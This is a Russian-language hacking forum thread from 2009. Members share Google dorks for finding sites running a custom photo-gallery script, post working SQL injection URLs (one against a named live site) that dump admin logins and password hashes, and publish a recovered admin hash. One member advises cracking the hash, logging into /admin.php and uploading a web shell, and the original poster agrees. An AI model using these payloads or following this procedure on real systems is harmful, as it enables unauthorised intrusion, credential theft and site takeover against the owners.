foto_pr.php (Уязвимость)

Discussion in 'Уязвимости' started by Assembler, 17 Feb 2009.

  1. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Начну с того что сайты с уязвимостями ищу через гулевский allinurl:
    Тут недавно наткнулся на сайт фото галереи http://pix.in.ua/foto_pr.php?id=-16%20union%20select%201,2,3,4,5,6,7,version()-- и сделал скулю..
    Но факт в том что при запросе в гугле
    allinurl: foto_pr.php вылазет много сайтов с одной и той же уязвимостью..
    foto_pr.php?id=-16+union%20select+1,2,3,4,5,6,7,concat_ws(0x3a,id,name,login,pass) from gallery_admin--

    Вопрос. Че это за движек такой..? =)
     
    #1 Assembler, 17 Feb 2009
    Last edited: 17 Feb 2009
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Много сайтов гугл выдаёт по запросу
    allinurl: com_content :D

    А в твоём случае их 9 штук .Это самопис какой-то ИМХО

    ЗЫ Была где-то тема "помогите определить движок", но видимо при последнем сбое она пропала , я не нашол во всяком случае :(
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Assembler, без названия. просто движок.. он, как видишь не так популярен.
     
    _________________________
  4. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Мб будет каданить =))
     
  5. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Двиг самописный - открыл сайта 3-4 из того что выдал гугл на всех одна и та же пара логин-хеш:

    Code:
    bolt:f07ad2552c86bfd4d2396c0114f785ea
    Побрутил немножко - сбручиваться оно не захотело, по этому положил прям таки логин)) на этот хеш.

    Если очень интересно, то бруть хеш, попадай в админку (/admin.php), заливай шелл и изучай сорцы.
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://www.google.ru/search?hl=ru&q=f07ad2552c86bfd4d2396c0114f785ea&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=

    мм, а хэш знаменит.
     
    _________________________
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Оке, так и сделаю =)